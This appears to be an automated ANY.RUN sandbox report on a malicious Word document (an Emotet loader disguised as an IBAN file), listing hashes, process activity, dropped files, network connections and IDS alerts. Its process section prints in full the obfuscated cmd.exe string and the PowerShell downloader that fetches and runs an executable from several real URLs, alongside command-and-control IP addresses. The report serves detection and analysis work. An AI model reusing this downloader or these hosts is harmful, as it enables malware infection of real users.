analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

IBAN_DE04 9905 7565 6932 0401 62.doc

Full analysis: https://app.any.run/tasks/9d5bbd57-2c82-45db-a1cb-b137ca9a23fa
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: December 18, 2018, 10:54:56
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
trojan
emotet
feodo
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Dec 18 07:36:00 2018, Last Saved Time/Date: Tue Dec 18 07:36:00 2018, Number of Pages: 1, Number of Words: 5, Number of Characters: 33, Security: 0
MD5:

90BABAFC6C67C4CB0C7007A9BB19E783

SHA1:

4236C23448B94A4519BC765F0642D515B7EBC96D

SHA256:

B8A7A5DA8C978F8440141BCC14BCD4F393CB92F6C6C48CCE52A03EF7C180AF33

SSDEEP:

1536:FL4w1LD4fbKghmXB5luOUom8uW41LIpiXievnH+a9:Fcw13eKQOUo101O+iev

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2952)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2704)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2952)
    • Application was dropped or rewritten from another process

      • archivesymbol.exe (PID: 2236)
      • 995.exe (PID: 3944)
      • 995.exe (PID: 2848)
      • archivesymbol.exe (PID: 1172)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 2616)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2616)
    • EMOTET was detected

      • archivesymbol.exe (PID: 1172)
    • Changes the autorun value in the registry

      • archivesymbol.exe (PID: 1172)
    • Connects to CnC server

      • archivesymbol.exe (PID: 1172)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 1268)
    • Application launched itself

      • cmd.exe (PID: 1268)
    • Creates files in the user directory

      • powershell.exe (PID: 2616)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2616)
      • 995.exe (PID: 2848)
    • Starts itself from another location

      • 995.exe (PID: 2848)
    • Connects to unusual port

      • archivesymbol.exe (PID: 1172)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2952)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2952)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 37
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 33
Words: 5
Pages: 1
ModifyDate: 2018:12:18 07:36:00
CreateDate: 2018:12:18 07:36:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: -
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
8
Malicious processes
8
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe 995.exe no specs 995.exe archivesymbol.exe no specs #EMOTET archivesymbol.exe

Process information

PID
CMD
Path
Indicators
Parent process
2952"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\IBAN_DE04 9905 7565 6932 0401 62.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1268c:\sVwCiOzTWNiPm\WzCkFlcVSW\VlBsmipsbU\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set W6XZ=;'jcW'=Fjo$}}{hctac}};kaerb;'TLz'=lbz$;SEc$ metI-ekovnI{ )00008 eg- htgnel.)SEc$ metI-teG(( fI;'qpt'=whj$;)SEc$ ,NFz$(eliFdaolnwoD.ztL${yrt{)qjP$ ni NFz$(hcaerof;'exe.'+WCk$+'\'+pmet:vne$=SEc$;'SKz'=Tcu$;'599' = WCk$;'lvI'=brk$;)'@'(tilpS.'Of3mJi1/moc.gepohsknip.www//:ptth@0vb6pEI/gro.laiafamafa.www//:ptth@8IIXV32/gro.amhcim//:ptth@fURWISRxU8/moc.secivresretupmocaesnaws.www//:ptth@0NgwrKGs2Y/moc.oknecvov-llatsnner.www//:ptth'=qjP$;tneilCbeW.teN tcejbo-wen=ztL$;'rvj'=tZz$ llehsrewop&&for /L %X in (485,-1,0)do set Pjv=!Pjv!!W6XZ:~%X,1!&&if %X leq 0 call %Pjv:*Pjv!=%"c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2704CmD /V/C"set W6XZ=;'jcW'=Fjo$}}{hctac}};kaerb;'TLz'=lbz$;SEc$ metI-ekovnI{ )00008 eg- htgnel.)SEc$ metI-teG(( fI;'qpt'=whj$;)SEc$ ,NFz$(eliFdaolnwoD.ztL${yrt{)qjP$ ni NFz$(hcaerof;'exe.'+WCk$+'\'+pmet:vne$=SEc$;'SKz'=Tcu$;'599' = WCk$;'lvI'=brk$;)'@'(tilpS.'Of3mJi1/moc.gepohsknip.www//:ptth@0vb6pEI/gro.laiafamafa.www//:ptth@8IIXV32/gro.amhcim//:ptth@fURWISRxU8/moc.secivresretupmocaesnaws.www//:ptth@0NgwrKGs2Y/moc.oknecvov-llatsnner.www//:ptth'=qjP$;tneilCbeW.teN tcejbo-wen=ztL$;'rvj'=tZz$ llehsrewop&&for /L %X in (485,-1,0)do set Pjv=!Pjv!!W6XZ:~%X,1!&&if %X leq 0 call %Pjv:*Pjv!=%"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2616powershell $zZt='jvr';$Ltz=new-object Net.WebClient;$Pjq='http://www.rennstall-vovcenko.com/Y2sGKrwgN0@http://www.swanseacomputerservices.com/8UxRSIWRUf@http://michma.org/23VXII8@http://www.afamafaial.org/IEp6bv0@http://www.pinkshopeg.com/1iJm3fO'.Split('@');$krb='Ivl';$kCW = '995';$ucT='zKS';$cES=$env:temp+'\'+$kCW+'.exe';foreach($zFN in $Pjq){try{$Ltz.DownloadFile($zFN, $cES);$jhw='tpq';If ((Get-Item $cES).length -ge 80000) {Invoke-Item $cES;$zbl='zLT';break;}}catch{}}$ojF='Wcj';C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3944"C:\Users\admin\AppData\Local\Temp\995.exe" C:\Users\admin\AppData\Local\Temp\995.exepowershell.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS® DLL for Win32
Exit code:
0
Version:
8.00.0.010
2848"C:\Users\admin\AppData\Local\Temp\995.exe"C:\Users\admin\AppData\Local\Temp\995.exe
995.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS® DLL for Win32
Exit code:
0
Version:
8.00.0.010
2236"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe995.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS® DLL for Win32
Exit code:
0
Version:
8.00.0.010
1172"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe
archivesymbol.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS® DLL for Win32
Version:
8.00.0.010
Total events
1 777
Read events
1 294
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
5

Dropped files

PID
Process
Filename
Type
2952WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA7BD.tmp.cvr
MD5:
SHA256:
2952WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6F1D2B07.wmf
MD5:
SHA256:
2952WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E05951AD.wmf
MD5:
SHA256:
2616powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1P620Y3LT2IFMBZBLALY.temp
MD5:
SHA256:
2616powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:0C1DAA668BA499584B0AC7476368101E
SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA
2952WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\774EF95C.wmfwmf
MD5:8079C758C51D466C92C7CCE87079EFE8
SHA256:469499A9E053BF7EA9BADC26298BD4BBDB4E7C04394A920FBED0E990B787E9EB
2848995.exeC:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exeexecutable
MD5:0817BB59A9639C0CBA69DFB486957E6A
SHA256:E611B9D95C9E2BFDDAE21D54AA326B0E504D40A1D3D872FB22C8069680576DEB
2952WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:AD7A594F018FDD26AF3E78AC20863D96
SHA256:0EBA12D91D07998CCA9BC9C871EDDF0493667173B07061EB40F6D2895B712F85
2616powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF13b653.TMPbinary
MD5:0C1DAA668BA499584B0AC7476368101E
SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA
2952WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:F446D97FB1F47542E3ED1EB7B33977D5
SHA256:A0CF5B682B265AB9F8EE5579A400088085262A561739AB89E9ED6FEBE5314AEA
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
9
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1172
archivesymbol.exe
GET
78.189.21.131:80
http://78.189.21.131/
TR
malicious
1172
archivesymbol.exe
GET
201.190.150.60:443
http://201.190.150.60:443/
AR
malicious
1172
archivesymbol.exe
GET
187.140.90.91:8080
http://187.140.90.91:8080/
MX
malicious
1172
archivesymbol.exe
GET
181.197.253.133:8080
http://181.197.253.133:8080/
AR
suspicious
1172
archivesymbol.exe
GET
200
70.55.69.202:7080
http://70.55.69.202:7080/
CA
binary
132 b
suspicious
2616
powershell.exe
GET
200
93.90.146.103:80
http://www.rennstall-vovcenko.com/Y2sGKrwgN0/
SE
executable
124 Kb
malicious
2616
powershell.exe
GET
301
93.90.146.103:80
http://www.rennstall-vovcenko.com/Y2sGKrwgN0
SE
html
253 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1172
archivesymbol.exe
81.150.17.158:50000
British Telecommunications PLC
GB
malicious
1172
archivesymbol.exe
201.190.150.60:443
ARLINK S.A.
AR
malicious
1172
archivesymbol.exe
78.189.21.131:80
Turk Telekom
TR
malicious
1172
archivesymbol.exe
81.150.17.158:8443
British Telecommunications PLC
GB
malicious
1172
archivesymbol.exe
181.197.253.133:8080
BVNET S.A.
AR
suspicious
1172
archivesymbol.exe
213.120.119.231:8443
British Telecommunications PLC
GB
malicious
1172
archivesymbol.exe
187.140.90.91:8080
Uninet S.A. de C.V.
MX
malicious
1172
archivesymbol.exe
70.55.69.202:7080
Bell Canada
CA
suspicious
2616
powershell.exe
93.90.146.103:80
www.rennstall-vovcenko.com
Levonline AB
SE
suspicious

DNS requests

Domain
IP
Reputation
www.rennstall-vovcenko.com
  • 93.90.146.103
malicious
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

PID
Process
Class
Message
2616
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
2616
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
2616
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2616
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2616
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
1172
archivesymbol.exe
A Network Trojan was detected
SC SPYWARE Spyware Emotet Win32
1172
archivesymbol.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
1172
archivesymbol.exe
A Network Trojan was detected
SC SPYWARE Spyware Emotet Win32
1172
archivesymbol.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
1172
archivesymbol.exe
A Network Trojan was detected
SC SPYWARE Spyware Emotet Win32
5 ETPRO signatures available at the full report
No debug info